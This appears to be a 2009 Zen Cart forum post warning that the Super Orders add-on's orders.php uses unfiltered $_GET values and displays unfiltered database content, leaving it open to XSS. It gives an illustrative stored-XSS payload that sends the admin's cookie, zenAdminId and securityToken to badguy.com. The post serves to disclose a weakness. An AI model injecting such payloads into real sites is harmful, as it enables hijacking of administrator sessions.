What I think is that super orders is in desperate need to be brought up to date, the orders.php dates back to early 2006, and there are multiple uses of unfiltered $_GET values as well as displaying values striaght out of the db, without filtering the content e.g. someone puts in a memo field
That's just a theoretical example, it doesn't work but if an administrator were to look at a COD order then it would secretly post the administrator's session information through to badguy.com, super orders is littered with XSS vulnerabilities. I may have time in a few weeks, but really there needs to be a fulltime volunteer. (I already maintain a couple of modules).Code:<script>document.images[0].src=http://badguy.com?document.cookie+' '+zenAdminId+' '+securityToken</script>
Philip.
Results 1 to 10 of 2019
Threaded View
-
9 Mar 2009, 08:10 PM #11
Suspended
- Join Date
- Sep 2008
- Posts
- 605
- Plugin Contributions
- 6
Re: Super Orders 2.0
Similar Threads
-
v150 Super Orders v4.0 Support Thread for ZC v1.5.x
By DivaVocals in forum Addon Admin ToolsReplies: 804Last Post: 18 Apr 2025, 12:04 AM -
v139h Super Orders v3.0 Support Thread (for ZC v1.3.9)
By DivaVocals in forum All Other Contributions/AddonsReplies: 1018Last Post: 28 Apr 2014, 11:38 PM -
RE: Super Orders v3.0 Support Thread
By Johnnyd in forum All Other Contributions/AddonsReplies: 0Last Post: 22 Jun 2011, 09:28 AM -
Super Orders 2.0 postage marks with Super Orders
By sketchhgal in forum All Other Contributions/AddonsReplies: 0Last Post: 22 Mar 2009, 03:05 PM -
Edit Orders and Super Orders, anyone doing that?
By swamyg1 in forum All Other Contributions/AddonsReplies: 0Last Post: 4 Feb 2009, 06:03 AM
Bookmarks